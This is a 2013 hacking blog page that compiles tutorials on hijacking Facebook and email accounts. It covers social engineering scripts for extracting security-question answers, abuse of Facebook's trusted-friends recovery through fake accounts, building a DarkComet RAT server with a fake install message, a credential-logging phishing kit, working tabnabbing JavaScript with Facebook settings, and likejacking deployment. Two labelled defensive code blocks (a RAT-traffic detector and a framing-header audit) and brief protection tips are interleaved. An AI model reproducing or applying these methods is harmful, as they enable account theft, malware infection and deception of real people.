Saturday, May 11, 2013

Social Engineering



I myself have had a few people in the past ask me questions on social engineering. I always say to anyone, you need to imagine social engineering as a game. But before I talk about the 'Game', I want to go into detail about basic knowledge and self-preparation.

Basic knowledge and self preparation:
It's important like most things in life to be fully equipped and prepared to take on a task. I myself would suggest you have clear outlines of what your trying to achieve, be it to get someone's email password, exploiting them for money, to get into a online game group/clan etc etc. In this case the email and password of Facebook account.

First of all, you need to take into consideration of what you will need, for this social engineering tutorial i'm going to outline this from an obtaining someone's email password perspective. Before i continue, i would like to stress some important factors you might want to take into consideration:

1) People are more open to you if they perceive you as an idiot.
2) People are less suspicious of you when you make them laugh.
3) People are more trusting if you actually take an interest in them.

I'm going to break these three points down to give you a better understanding of why this is:

In the case of 1 - nearly everyone seems to be more careless when they perceive you as an idiot. The main reason is that you don't consider someone who appears to be an idiot a threat. Another reason is that people tend to become more open and arrogant when they feel they are on a higher pedestal than you (never forget that!). There are things you need to remember, however: although these things are true, if you overplay your idiot persona it will not work in your favour. Always remember real morons are annoying as hell; you DO NOT want to put off the person you're trying to social engineer (unless you're trying to fail, then knock yourself out).

In the case of 2 - when talking to someone it's easy to see why this rule is advised. Often it's a good ice breaker, also reinforcing the idea that "you're a nice guy"; it slowly allows the person to build a relationship of 'trust' with you.

In the case of 3 - also an obvious piece of advice. If you just pester someone for information without at least pretending to take an interest in what they are saying, not only will you come across as rude, it will make the person wonder why you're probing them for personal info.

With these three points made, i will now continue with my example of obtaining someone's Facebook Email and password. Before you go into detail, it's important to outline what you need to successfully social engineer the password out of someone. Now you could try to Social engineer them for their password, I advise you be a bit more intelligent and indirectly social engineer them for their password by obtaining their password recovery knowledge. Now it's important to what you need to successfully hack their account through recovery questions. You will need the following:

Their email address
Their account password

With this in mind it's imperative you plan how you will obtain these details. I will tell you how i do it. But first i need you to understand, this whole transaction will not be completed over a course of a day, it can take days to weeks depending on the person. I suggest you talk to them and read them first. If their open, then you can do it within days, if their not then it would be better you spread this out over a week or two. I also want you to imagine what you will say, try to predict their answers and MOST OF ALL, think of a scapegoat on why your probing them for these answers, just in case your less than suttle and arouse suspicion, if they ever suspect you it will go from a flame to a fire it's important to stamp all of their doubt in you as soon as possible.

Now there are many ways you can obtain their password and addressee. Some people and post their address on their profiles. In which case this is easy pickings, however that is rare. So you need to devise a way of obtaining that info. Now you can pretend that you are from bank or something like this and ask for their email address. Or you can pretend that you are some student an doing some research. Be creative

Now i need the answer to their security question, now you need to find out what the question is, i suggest pretend to recover password to see what it is or get the info for all of the recovery questions email asks. Im going to go with the first option and say for example their recovery question was : What is your dogs name?.

How I would go about obtaining this would be to pretend to have a pet of my own, i would start off the convo like so:

me: Ffs my dog wont stop barking, seriously where did i leave my ducktape lol!
victim: lol yeah i know sometimes my dog's the same, annoying -.-
me: Oh you have a dog? i didn't realize whats your dogs name, if you don't mind me asking.

It is important to add "if you don't mind me asking", because it gives the person a bit of power over you and also show's a little respect (once again reinforcing the notion your a nice fellow).

POINT: I wouldn't dive straight into "whats your dogs name" start with the breed first and remember try to predict what they will inturn ask (mines blah blah whats yours?).

With that in mind, I'm sure by now you can see how easy it is, to social engineer someone's password through the indirect method of password recovery. Now obviously most recovery questions wont be about pets mostly they're "mothers maiden name" "place of birth" etc. But use the same logic and work around it, remember think every detail through and ask yourself this if someone gave you this story or asked you in a  certain way would it seem legit to you?
and when you have the email address, click on Facebook, I forgot password and will be sent on your email.

The Game:

The game is basically, perfecting "self preparation". Social engineering is a game,. If you think about it in this way: each time trust is given to you, you advance a level, which each level you advance, your ability of obtaining information from this person becomes easier. In a sense mastering the ability to come up with more ingenious ways of manipulating someone, without arousing suspicion, is what separates the lucky noobs from the elites.

When thinking about this as a game, you need to reflect on your goals. As I've mentioned before try to imagine the dialogue between you both, think about how you will obtain certain things and more importantly have clear directives. With this in mind i think we can now talk about how you might want to consider presenting yourself (only applies if the person is indeed a stranger).

So if you were going to go after a complete stranger, you should first try and get as much research on them as you can. For example, age, name. This is important for making up for fake identity. I would also suggest if you social engineer more than one person you write down, in detail! your differn't alias so you don't get confused. Nothing would be worse than using the wrong alias on the wrong person.

When building your identity decide on what would give you the biggest advantage with this person. This can be from faking your age to match the interests of this person, thus giving you the advantage of being able to "click" with the person. Pretending to be a student or in a dead end job for sympathy manipulation or in the case of a dead end job, pretending to relate to the slave. There are many things you can do, as I've mentioned it depends on the circumstances you need.


Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

Using 3 Fake Friends Method



Hack Facebook Account" is most popular term is the in Web, Previously I posted many articles on "Hack Facebook Accounts" with Keyloggers, phishing, etc but that Hacking Of Facebook Account methods are not working fine now a days. So Hackers have to go smarter and we have found a new security hole (its just a trick) in the FB. So we can Hack Facebook easily. Now we can hack Facebook online with the help of new password recovery feature of FB. So keep on reading about this new way for Hacking Of Facebook Account. FB recently released new way to Recover Account Password using "Three Trusted Friends" . If we forgot the Facebook account password then FB will send unique security code to three friends. Then we have to ask that security code to each three friend. And after giving that codes to FB we can recover the Facebook password. We can use this feature to Hack Facebook Account Free So here we are going to misuse this new feature of FB to Hack Facebook Account. We have to just create 3 fake Fb accounts and then have to send the friend request from those 3 fake accounts to the victim. Victim must accept those friend request. Now we can use this above "Three Trusted Friend" feature to reset the victims' Facebook account password. I have given a full guide on How To Hack Facebook Accounts. 

Note - The 3 fake account must be 7 day older, otherwise this Facebook Hack will not work So lets start on our tutorial on Hack Facebook Account.

1. Go to Facebook.com and click on Forgot Password.

2. Now give the victim's Facebook account email or if give the FB username or Profile name and click on search. And then you will get the victims profile account. Just click on "This is my Account". 

3. Then click on "No longer have access to this". 

4. Now you will be asked to enter new email address, just enter your own new email address. 

5. Now Facebook will ask you to give security question's answer. Not to worry, just enter wrong answer thrice and you will be taken to the new page. 

6. Here is the main part of Hacking Of Facebook Account. Click on Continue and FB will ask you to select 3 Trusted Friends. Their will be a full friend's list of the victim which also includes your previously created "Three Fake Facebook Account" . Just select that three accounts and then Facebook will send security codes to our fake accounts. Now collect those security codes and enter it. Then Facebook will send"Password Recovery Email" at the email address we entered in 4th step. Thus you can easily reset the password of victim's account. 

No we have successfully done with Hack Facebook Accounts 

Note: We have received the problems like they don't get the new page in step 5. So this depends on the victim's activity on Facebook account.

So friends, I hope you enjoyed this article on Hack Facebook Accounts and if you have any problem with this Hack Facebook Account Free then please do comment.

Remote Administration Tools



A remote administration tool (or RAT) is a program that allows certain persons to connect to and manage remote computers in the Internet or across a local network. A remote administration tool is based on the server and client technology. The server part runs on a controlled computer and receives commands from the client, which is installed on other remote host. A remote administration tool works in background and hides from the user. The person who controls it can monitor user’s activity, manage files, install additional software, control the entire system including any present application or hardware device, modify essential system settings, turn off or restart a computer.

  • Go on http://www.no-ip.com/, Create your Account and click on "Download".
  • Now Click on "Windows
  • Now Click on "Download 3.0.4"
  • Now you must install No-DUP 3.0, Click on "Next"
  • Now, choose "Install Location" and click on "Next"
  • Now choose "Start Menu Folder" and Click on "Install"
  • Setup was completed successfully, click on "Close"
  • Now, go on http://www.no-ip.com/ and click on "Login" then type your Email and your Password.
  • Now, click on "Add a Host"
  • Choose a "Hostname", enter your IP address and click on "Create Host".
  •  Done, Now open No-IP DUC 3.0 and enter your email and your password and click on "OK"
  • Now, Select your "HOST" and click on "Save".
  • Done, you can close No-IP DUC 3.0
  • Download DarkComet v4.0 here and run DarkComet. 
  • Click on [+], Choose your port (I advice 1604) and click on "Listen".
  • Now click on "Settings".
  • Click on "Mo-IP Updater" and type your No-IP informations.
  • Now you will edit your server, click on "Edit Server" and click on "Network Settings", enter your informations and click on "Test network".
  • Click on "Module Startup" and choose your settings.
  • Click on "Install Message" and choose your fake message.
  • Now click on "Module Shield" and choose your settings.
  • Now click on "Build Module" and click on "Build Server".
  • See the Results
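
Seen from the network, the setup above has two observable traits: the controller is reached through a No-IP hostname and listens on TCP port 1604. The following added example (not from the original page) triages constructed DNS and connection log lines for that pattern; the log format, the function names and the suffix list, a sample of No-IP hostname domains, are assumptions.

```javascript
// Added example: triage DNS/connection logs for the dynamic-DNS + port 1604 pattern.
// Assumed log format: "<timestamp> <dns|conn> <source-ip> key=value ..."

// Sample of No-IP hostname suffixes (assumption; extend with your own list).
const DYNDNS_SUFFIXES = ['no-ip.org', 'no-ip.biz', 'zapto.org', 'hopto.org', 'ddns.net'];
const RAT_PORT = 1604; // listener port suggested on this page
const RANK = { low: 1, medium: 2, high: 3 };

// Split one log line into its fixed columns and key=value fields.
function parseLine(line) {
  const [ts, kind, src, ...rest] = line.trim().split(/\s+/);
  const fields = {};
  for (const kv of rest) {
    const i = kv.indexOf('=');
    if (i > 0) fields[kv.slice(0, i)] = kv.slice(i + 1);
  }
  return { ts, kind, src, fields };
}

// True when the name is a dynamic-DNS suffix or a host below one.
// Matching on a label boundary avoids false hits such as "notno-ip.org".
function isDynDns(name) {
  const n = (name || '').toLowerCase().replace(/\.$/, '');
  return DYNDNS_SUFFIXES.some((s) => n === s || n.endsWith('.' + s));
}

// Return { sourceIp: { severity, reason } }, keeping the highest severity per host.
//   medium: host resolved a dynamic-DNS name
//   low:    host connected to port 1604 (a port match alone is a weak signal)
//   high:   host connected on port 1604 to an IP it got from a dynamic-DNS answer
function scoreHosts(lines) {
  const dynAnswers = new Map(); // source IP -> Set of IPs returned for dynamic-DNS names
  const scores = {};
  const raise = (host, severity, reason) => {
    const cur = scores[host];
    if (!cur || RANK[severity] > RANK[cur.severity]) scores[host] = { severity, reason };
  };
  for (const line of lines) {
    if (!line.trim()) continue;
    const { kind, src, fields } = parseLine(line);
    if (kind === 'dns' && isDynDns(fields.query)) {
      if (!dynAnswers.has(src)) dynAnswers.set(src, new Set());
      if (fields.answer) dynAnswers.get(src).add(fields.answer);
      raise(src, 'medium', `dynamic DNS lookup: ${fields.query}`);
    } else if (kind === 'conn' && Number(fields.dport) === RAT_PORT) {
      const viaDyn = dynAnswers.has(src) && dynAnswers.get(src).has(fields.dst);
      raise(src, viaDyn ? 'high' : 'low',
        `outbound connection to ${fields.dst}:${RAT_PORT}` +
        (viaDyn ? ' resolved via dynamic DNS' : ''));
    }
  }
  return scores;
}

// Constructed sample log lines (documentation address ranges, not real traffic).
const SAMPLE_LOG = [
  '2013-05-11T10:00:01Z dns 10.0.0.23 query=updates.example.com answer=192.0.2.10',
  '2013-05-11T10:00:05Z dns 10.0.0.23 query=myhost.no-ip.org answer=203.0.113.50',
  '2013-05-11T10:00:06Z conn 10.0.0.23 dst=203.0.113.50 dport=1604 proto=tcp',
  '2013-05-11T10:01:00Z conn 10.0.0.40 dst=198.51.100.7 dport=443 proto=tcp',
  '2013-05-11T10:02:00Z conn 10.0.0.41 dst=198.51.100.9 dport=1604 proto=tcp',
  '2013-05-11T10:03:00Z dns 10.0.0.55 query=cam.ddns.net answer=203.0.113.77',
];

const report = scoreHosts(SAMPLE_LOG);
for (const [host, r] of Object.entries(report)) {
  console.log(`${host}\t${r.severity}\t${r.reason}`);
}
```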



Phishing




Phishing - is an e-mail fraud method in which the perpetrator sends out legitimate-looking email in an attempt to gather personal and financial information from recipients. Typically, the messages appear to come from well known and trustworthy Web sites. Web sites that are frequently spoofed by phishers include PayPal, eBay, MSN, Yahoo, BestBuy, and America Online. A phishing expedition, like the fishing expedition it's named for, is a speculative venture: the phisher puts the lure hoping to fool at least a few of the prey that encounter the bait.


1. First a fall you need a fake login page for facebook (fake.html),and a Php script to redirect and capture the victims passwords (login.php)
2. Download Here - Click Me

Password - @hackaholic
After you download the files, Open login.php,with a note pad and search for the term www.enteryoursite.com and replace it with the site address where you want the victim to be redirected ,finally save it.

Note : This a very important step redirect the victim to a proper site other wise the victim will get suspicious .In our case we are making fake face booklogin page so its better to redirect the victim to www.facebook.com/careers

4. Now create an account at Free web hosting site like 110mb.com , T35.com or ripway.com


5. Now upload both the files (fake.html , login.php ) to your hosting account and send the fake.html(fake facbook login page) link to your victim


            Example:- www.yoursite.110 mb.com/fake.html

6. Now when the victim enters all his credentials, like login name and password in our fake login page and when he clicks login He will be redirected to site which we did in step 3 


7. Now to see the victims id ,password, login to your hosting account "110mb.com " where you will see a new file "log.txt" .Open it to see the victims user id and the password

Note:- If your still confused, you can watch my video on Hack a Facebook Account Using a Fake login Page 

This is a simple but a very effective method to Hack face book accounts .If you have any doubts please feel free to comment !!


Tabnabbing



Hey friends, it's Chris Defaulter Valentine, a Microsoft Certified Systems Engineer (MCSE), Internet Marketer, IIT hacker. I have 10 years' experience circumventing information security measures and can report that I've successfully compromised all systems that I targeted for unauthorized access except one. I have two years' experience as a private investigator, and my responsibilities included finding people and their money, primarily using social engineering techniques. Today I am going to explain how to hack emails, social networking websites and other websites involving login information. The technique that I am going to teach you today is Advanced Tabnabbing. I have already explained what basic tabnabbing is; today we will extend our knowledge base, and I will explain things with a practical example. So let's learn.


1. A hacker say(me Chris) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details) 

2. I sends a copy of this web page to victim whose account or whatever i want to hack. 

3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script. 

4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages. 

5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one. 

6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him. 

Here end's the attack scenario for advanced tabnabbing. 

Before the coding part, let's first share tips to protect yourself from this kind of attack, because it's completely undetectable and you will never be able to know that your account got hacked or compromised. So first learn how to protect ourselves from Advanced Tabnabbing.

Follow the measures below to protect yourself from tabnabbing:

1. Always use anti-JavaScript plugins in your web browser that stop the execution of malicious JavaScript, for example NoScript for Firefox.

2. If you notice anything suspicious happening, first of all verify the URL in the address bar.

3. If you receive a link in an email or chat message, never click on it directly. Always prefer to type it manually in the address bar to open it; this may cost you some manual work or time, but it will protect you from hidden malicious URLs.

4. The best way is to use a good web security toolbar, like the AVG web toolbar or Norton web security toolbar, to protect yourself from such attacks.

5. If you use ideveloper or Firebug, then verify the headers yourself if you find something suspicious.

That ends our security part. Here ends my ethical hacker duty to notify all users about the attack. Now let's start the real stuff.

Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.

First sample code for doing tabnabbing with the help of iframes: 

 <!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: Chris Defaulter Valentine ( Anonymous )
-->

<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>

<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";

//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
 BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;

//Set FAVICON
if(REAL_FAVICON){
 var link = document.createElement('link');
 link.type = 'image/x-icon';
 link.rel = 'shortcut icon';
 link.href = REAL_FAVICON;
 document.getElementsByTagName('head')[0].appendChild(link);
}

//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);

//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();

//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
 el_tabnab.onblur = function(){
 TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
 }
 el_tabnab.onfocus= function(){
 if(TIMER) clearTimeout(TIMER);
 }
} else {
 setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}

function TabNabIt(){
 if(SWITCHED == "false"){
 //Redirect the iframe to FAKE_PAGE_URL
 el_tabnab.src=FAKE_PAGE_URL;
 //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
 if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

 //Change the favicon -- This doesn't seem to work in IE
 if(BROWSER_TYPE != "Internet Explorer"){
 var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
 for (var i=0; i<links.length; i++) {
 var looplink = links[i];
 if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
 document.getElementsByTagName("head")[0].removeChild(looplink);
 }
 }
 var link = document.createElement("link");
 link.type = "image/x-icon";
 link.rel = "shortcut icon";
 link.href = FAKE_FAVICON;
 document.getElementsByTagName("head")[0].appendChild(link);
 }
 }
}
</script>

</body>
</html>

Now what you need to replace in this code to make it working say for Facebook:

1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any freeweb hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..


Clickjacking


What is Clickjacking?

Clickjacking is a technique used by hackers or spammers to trick users into clicking on links or buttons that are hidden from normal view (usually the link's color is the same as the page background). Clickjacking is possible because of a security weakness in web browsers that allows web pages to be layered and hidden from general view. You think that you are clicking on a standard button or link, like the PLAY button or download button on a video, but you are really clicking on a hidden link. Since you can't see the clickjacker's hidden link, you have no idea what you're really doing. You could be downloading malware or making all your Facebook information public without realizing it. Some good hackers make AJAX keyloggers and put them as JavaScript on their fake websites; when you open them, they retrieve all the passwords stored in your web browser, record whatever you type while the web browser is open, and store this information on their servers.

There are several types of clickjacking, but the most common is to hide a LIKE button under a dummy or fake button. This technique is called Likejacking. A scammer or hacker might trick you into saying that you like a product you've never heard of. At first glance, likejacking sounds more annoying than harmful, but that's not always true. If you're scammed into liking Mark Zuckerberg, the world isn't likely to end. But you may be helping to spread spam or possibly sending friends somewhere that contains malware.
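
Both the iframe-based tabnabbing sample earlier on this page and the layered-page clickjacking described here depend on loading another site's page inside a frame, which the site owner can refuse with `X-Frame-Options` or the CSP `frame-ancestors` directive. The following is an added example, not code from the original post: a header audit a site owner can run over their own responses, where `auditFraming`, `frameAncestors` and the sample responses are constructed for illustration.

```javascript
// Added example: audit a response's anti-framing headers.
// Input is a plain object mapping lower-cased header names to values.

// Return the frame-ancestors source list from a CSP value, or null if absent.
function frameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map((t) => t.toLowerCase());
    }
  }
  return null;
}

// Classify a response as 'blocked' (no framing), 'restricted' (named origins
// only) or 'frameable' (any page may embed it), with notes explaining why.
function auditFraming(headers) {
  const notes = [];
  const fa = frameAncestors(headers['content-security-policy']);
  const xfo = (headers['x-frame-options'] || '').trim().toLowerCase();
  let verdict = 'frameable';

  if (fa !== null) {
    // Browsers that support frame-ancestors enforce it and ignore X-Frame-Options.
    const open = fa.filter((s) => s === '*' || s === 'http:' || s === 'https:');
    if (fa.length === 0 || (fa.length === 1 && fa[0] === "'none'")) {
      verdict = 'blocked';
    } else if (open.length > 0) {
      notes.push('frame-ancestors allows any origin: ' + open.join(' '));
    } else {
      verdict = 'restricted';
    }
    if (!xfo) notes.push('no X-Frame-Options fallback for legacy browsers');
  } else if (xfo === 'deny') {
    verdict = 'blocked';
  } else if (xfo === 'sameorigin') {
    verdict = 'restricted';
  } else if (xfo.startsWith('allow-from')) {
    notes.push('ALLOW-FROM is obsolete and ignored by current browsers');
  } else if (xfo) {
    notes.push('unrecognized X-Frame-Options value: ' + xfo);
  } else {
    notes.push('no anti-framing header');
  }
  return { verdict, notes };
}

// Constructed sample responses (not captured from any real site).
const SAMPLES = {
  'no headers': {},
  'xfo deny': { 'x-frame-options': 'DENY' },
  'csp none': { 'content-security-policy': "default-src 'self'; frame-ancestors 'none'" },
  'csp partner': { 'content-security-policy': "frame-ancestors 'self' https://partner.example" },
  'csp wildcard beats xfo': {
    'content-security-policy': 'frame-ancestors *',
    'x-frame-options': 'DENY',
  },
  'allow-from': { 'x-frame-options': 'ALLOW-FROM https://partner.example' },
};

for (const [name, headers] of Object.entries(SAMPLES)) {
  const { verdict, notes } = auditFraming(headers);
  console.log(`${name}: ${verdict}${notes.length ? ' (' + notes.join('; ') + ')' : ''}`);
}
```

A login page should come out as `blocked`; `frameable` on such a page means it can be embedded and overlaid in the way this section and the tabnabbing section describe.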

How It Works

The like button is made hidden and it moves along with the mouse.So, wherever the user clicks, the like button is clicked and your fan page is liked.First download the JavaScript from the below download link.

Mediafire

After downloading the script extract all the files.Now modify the config.js and follow the below instructions.

1. Modify config.js file in "src" folder to change fan page URL and other things.
Comments are provided beside them to help you what they do exactly.

2. There is a time out function after which the like button will not be present(move) anymore. 
"time" if set to 0 will make it stay forever(which is usually not preferred).

3. Set opacity to '0' before you run the script. Otherwise the like button will not be invisible

Properly set the var in the file if it is jumbled ?

 After modifying the config.js script upload these scripts to javascript hosting website.I prefer yourjavascript you can also upload to some other website. 

How To Run The Script ?

1. Add config.js just above head tag in your pages
----------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/config.js"> </script>
----------------------------------------------------------------------------------------------------------------

2. Add like.js after body tag in your pages
----------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/like.js"> </script>
----------------------------------------------------------------------------------------------------------------

Remove src link with your uploaded link.

5. That's it. The script is ready to go.